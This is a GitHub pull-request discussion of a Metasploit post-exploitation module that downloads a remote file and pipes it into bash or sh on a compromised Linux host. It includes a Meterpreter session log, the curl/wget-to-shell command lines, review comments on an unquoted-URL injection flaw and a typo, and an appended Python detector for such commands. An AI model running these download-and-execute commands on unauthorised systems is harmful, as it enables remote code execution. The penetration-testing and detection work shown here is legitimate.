wget support for post/linux/manage/download_exec #1622

Merged
merged 1 commit into from Mar 21, 2013

@dougsko dougsko commented Mar 21, 2013

The module looks for wget in $PATH if curl isn't found.

msf post(download_exec) > info

       Name: Linux Download Exec
     Module: post/linux/manage/download_exec
    Version: 0
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Joshua D. Abraham <jabra@praetorian.com>

Description:
  This module downloads and runs a file with bash. It first tries to 
  uses curl as its HTTP client and then wget if it's not found. Bash 
  found in the PATH is used to execute the file.
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.136:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.136:4444 -> 10.0.0.100:41524) at 2013-03-21 00:02:02 -0400

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > set session 1
session => 1
msf post(download_exec) > set url 'http://pastebin.com/raw.php\?i=RkVqNudD'
url => http://pastebin.com/raw.php\?i=RkVqNudD
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting                          Required  Description
   ----     ---------------                          --------  -----------
   SESSION  1                                        yes       The session to run this module on.
   URL      http://pastebin.com/raw.php\?i=RkVqNudD  yes       Full URL of file to download.

msf post(download_exec) > exploit

[*] Checking if curl exists in the path...
[!] curl not available on the $PATH, checking for wget...
[*] Checking if wget exists in the path...
[+] wget available, going ahead...
[*] 10.1.0.25 - Meterpreter session 1 closed.  Reason: Died
[-] Post interrupted by the console user
[*] Post module execution completed
msf post(download_exec) >

end

if datastore['URL'].match(/https/)
cmd_exec_vprint("`which curl` -k #{datastore['URL']} 2>/dev/null | `which bash` ")
cmd_exec_vprint("`which #{http_client}` #{stdout_option} #{ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
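Review bot: datastore['URL'] is interpolated into the shell command unquoted in the new cmd_exec_vprint line, so characters such as ? and & in the URL are interpreted by the remote shell; the test run above had to set the URL with \? for that reason. Quote or shell-escape the value before building the command string. The guard datastore['URL'].match(/https/) also matches "https" anywhere in the URL rather than only as the scheme; anchor it at the start of the string.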
Is there any reason why bash is preferred vs plain old sh? As far as I can tell, looking for bash just reduces your success rate, for instance a busybox-based embedded device doesn't have bash, but it does have sh. ESXi is also a good example, the only shell on there (also busybox-based) is ash, to which /bin/sh is linked iirc.

@jvazquez-r7

Hi @dougsko,

Thanks for the addition, I've added a pull request to your branch for cleanup:

dougsko#2

Feel free to review, test and discuss anything. Once you feel comfortable with the changes, merge it into your repo and this pull request will be automatically updated :)

Test after changes:

msf post(download_exec) > use post/linux/manage/download_exec 
msf post(download_exec) > run

[*] Checking if curl exists in the path...
[*] Checking if wget exists in the path...
[+] wget available, using it
[*] Post module execution completed

@jvazquez-r7

@kernelsmith, the original pull request by @jasbro ( #1596 ) was using bash, since it's normally included in Linux distributions, and in a lot of them sh indeed points to bash, so it was fine for me.

I really was not taking into account the embedded devices point of view; it's true they normally use sh, I guess because it is "smaller" than bash. On the other hand, I ask myself how many embedded devices have curl and/or wget available... Still, I don't have a strong opinion about using bash or sh here. Are there more opinions about the topic?

@jasbro, do you have something more to say here?

@kernelsmith thanks for pointing out the topic! Nice discussion :)

@todb-r7
todb-r7 commented Mar 21, 2013

BusyBox does, indeed, ship with wget, and does not ship with bash. Check it:

http://www.busybox.net/live_bbox/live_bbox.html

So 👍 for sh over bash.

@jabra-
jabra- commented Mar 21, 2013

I think we should use bash if it exists and if not, drop to sh.

@jvazquez-r7

Okay! Let me merge this at this moment, since bash vs sh is not related to this pull request, and I'm going to open a new pull request which will switch to sh if bash isn't available :) Will be referencing this PR in the new PR.

Thanks @dougsko for PR and merging changes! Merging it!

def initialize(info={})
super( update_info( info,
'Name' => 'Linux Download Exec',
'Name' => 'Linux Manage Download and Exececute',
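Review bot: "Exececute" in the new 'Name' value is misspelled; the line should read 'Linux Manage Download and Execute'.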
Execute

@jvazquez-r7

btw, @todb-r7 , I guess busybox is configurable, so the number of binaries/components changes from embedded device to embedded device
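
From the defender's side, the command shape discussed in this thread (curl or wget located with `which`, its output piped into bash or sh) is recognisable in process command-line logs. The following is an added example, not code from this pull request or from Metasploit; the function names are hypothetical and the sample command lines and `example.invalid` hosts are constructed.

```python
import re
import shlex

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "ash", "dash"}

# `which curl` and $(which curl) resolve to a binary at run time; reduce both to the bare name.
WHICH = re.compile(r"`\s*which\s+([\w.-]+)\s*`|\$\(\s*which\s+([\w.-]+)\s*\)")

def program(stage):
    """Base name of the program one pipeline stage executes ('' if none)."""
    stage = WHICH.sub(lambda m: m.group(1) or m.group(2), stage)
    try:
        words = shlex.split(stage)
    except ValueError:              # unbalanced quotes: fall back to a plain split
        words = stage.split()
    while words and re.fullmatch(r"\w+=.*", words[0]):   # skip VAR=value prefixes
        words.pop(0)
    return words[0].rsplit("/", 1)[-1] if words else ""

def is_download_pipe_to_shell(cmdline):
    """True when a curl/wget stage is piped directly into a shell stage.

    Splits on single '|' only ('||' is left alone). A '|' inside quotes and
    wrappers such as sudo are not handled.
    """
    names = [program(s) for s in re.split(r"(?<!\|)\|(?!\|)", cmdline)]
    return any(a in DOWNLOADERS and b in SHELLS for a, b in zip(names, names[1:]))

def scan(lines):
    """Return the command lines that match, in input order."""
    return [l for l in lines if is_download_pipe_to_shell(l)]

# Constructed command lines (not captured from a real host).
SAMPLE = [
    "`which curl` -k https://example.invalid/a.sh 2>/dev/null | `which bash` ",
    "$(which wget) -qO- http://example.invalid/a.sh 2>/dev/null | $(which sh)",
    "/usr/bin/curl -s http://example.invalid/i.sh | /bin/sh",
    "curl -s http://example.invalid/data.json | jq .",
    "wget http://example.invalid/pkg.tar.gz",
    "cat notes.txt | bash",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("ALERT download piped to shell:", hit)
```

Feed it the command-line field from process-execution telemetry (for example auditd EXECVE records or EDR process events); because it matches sh, ash and dash as well as bash, it covers the BusyBox case raised in the discussion.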
